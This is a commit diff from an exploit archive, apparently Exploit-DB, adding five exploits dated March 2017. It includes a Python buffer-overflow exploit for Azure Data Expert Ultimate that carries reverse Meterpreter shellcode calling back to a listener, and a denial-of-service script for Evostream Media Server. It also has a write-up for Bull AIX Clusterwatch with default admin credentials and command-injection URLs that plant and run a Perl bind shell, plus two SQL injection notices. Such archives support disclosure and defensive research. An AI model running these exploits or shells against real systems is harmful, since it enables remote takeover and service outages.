DB: 2017-03-08

5 new exploits Evostream Media Server 1.7.1 (x64) - Denial of Service Azure Data Expert Ultimate 2.2.16 - Buffer Overflow Mini CMS 1.1 - 'name' Parameter SQL Injection Daily Deals Script 1.0 - 'id' Parameter SQL Injection Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities
2017-03-08 05:01:19 +00:00 · 2017-03-08 05:01:19 +00:00 · 6883068111
commit 6883068111
parent 9aef664a7e
6 changed files with 191 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5387,6 +5387,7 @@ id,file,description,date,author,platform,type,port
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
+41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1  (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15309,6 +15310,7 @@ id,file,description,date,author,platform,type,port
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
+41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate  2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37456,3 +37458,6 @@ id,file,description,date,author,platform,type,port
 41539,platforms/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41540,platforms/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",php,webapps,0
 41541,platforms/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",json,webapps,0
+41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
+41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
+41546,platforms/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps,0
--- a/platforms/aix/webapps/41546.txt
+++ b/platforms/aix/webapps/41546.txt
@ -0,0 +1,41 @@
+Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.
+
+Marble effect in the web banner and questionable font: it smells the 90s !
+
+Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:
+
+Trivial admin credentials
+Authenticated user can write on the system file
+Authenticated user can inject OS commands
+By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.
+
+We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesn’t matter, let’s do some archeology alone.
+
+Here are the details:
+
+
+1. Trivial creds: smwadmin/bullsmw
+
+2. Authenticated user can write on the system file
+
+A page allows sysadmins to customize a few things including filters that are used in the process listing page (the tool allows you to list your running processes).
+
+But these filters are written on disk and you can call them using the following OS command injection.
+
+Request to write the shellcode:
+
+http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A
+
+The shellcode we used:
+
+perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'
+
+3. Authenticated user can inject OS commands
+
+When listing the processes you can apply a filter… and inject a single command using backticks, great !
+
+Very useful to execute our shellcode which was stored in a single file (the filter).
+
+Request to execute the shellcode:
+
+http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"
--- a/platforms/php/webapps/41543.txt
+++ b/platforms/php/webapps/41543.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Mini CMS v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 07.03.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software : http://www.icloudcenter.com/mini_cms.htm
+# Demo: http://www.icloudcenter.net/demos/mini_cms/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?page=static_pages&name=[SQL]
+# # # # #
--- a/platforms/php/webapps/41544.txt
+++ b/platforms/php/webapps/41544.txt
@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Daily Deals Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.03.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software : http://www.icloudcenter.com/daily_deals_site.htm
+# Demo: http://icloudcenter.net/demos/icgroupdeals/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/deal.php?id=[SQL]
+# # # # #
--- a/platforms/windows/dos/41547.py
+++ b/platforms/windows/dos/41547.py
@ -0,0 +1,42 @@
+# Exploit Title: Evostream Media Server 1.7.1 – Built-in Webserver DoS
+# Date: 2017-03-07
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: https://evostream.com/software-downloads/
+# Version: 1.7.1
+# Tested on: Windows Server 2008 R2 Standard x64
+# CVE : CVE-2017-6427
+
+# 2017-03-02: Vulnerability reported
+# 2017-03-03: Software vendor answered, vulnerability details shared
+# 2017-03-07: No answer, publishing
+
+import socket
+import sys
+
+try:
+    host = sys.argv[1]
+    port = 8080
+except IndexError:
+    print "[+] Usage %s <host>  " % sys.argv[0]
+    sys.exit()
+
+
+
+buffer = "GET /index.html HTTP/1.1\r\n"
+buffer+= "Host: "+host+":"+str(port)+"\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
+r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: http://192.168.198.129/login"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Cont"+"\x41"*8+":\r\napplication/x-www-form-urlencoded\r\n"   # RCX Control
+#buffer+="\xff\xad\xde"+"\x41"*8+":\r\napplication/x-www-form-urlencoded\r\n" # Remove hash to control RDX and CX(it will have the value 0x000000000000dead)
+buffer+="Content-Length: 5900\r\n\r\n"
+buffer+="B"*4096 # This is just to prove that the stack will also contain any buffer delivered with the malicios HTTP header
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect((host,port))
+s.send(buffer)
+s.close()
--- a/platforms/windows/remote/41545.py
+++ b/platforms/windows/remote/41545.py
@ -0,0 +1,69 @@
+# Exploit Title: Azure Data Expert Ultimate 2.2.16 – buffer overflow
+# Date: 2017-03-07
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://www.azuredex.com/downloads.html
+# Version: 2.2.16
+# Tested on: Windows Server 2008 R2 Standard x64
+# CVE : CVE-2017-6506
+
+# The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.
+
+import socket
+
+# QtGui4.dll 0x6527635E - CALL ESP
+jmp = "\x5e\x63\x27\x65"
+nops = "\x90"*8
+
+
+# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20 
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
+
+rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
+"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
+"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
+"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
+"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
+"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
+"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
+"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
+"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
+"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
+"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
+"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
+"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
+"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
+"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
+"\xc1\x48\x45\x0e\x32\x6b\x4c")
+
+
+rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
+"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
+"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
+"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
+"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
+"\xe2\x79\xdc\x2d\x97\x97")
+
+
+buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
+port = 25
+s = socket.socket()
+ip = '0.0.0.0'             
+s.bind((ip, port))            
+s.listen(5)                    
+
+ 
+print 'Listening on SMTP port: '+str(port)
+if len(rev_met_1) >= 236:
+	print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')
+	exit(1) 
+elif len(rev_met_2) >= 76:
+	print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')
+	exit(1)
+ 
+while True:
+	conn, addr = s.accept()     
+	conn.send('220 '+buffer+'\r\n')
+	conn.close()
+	
+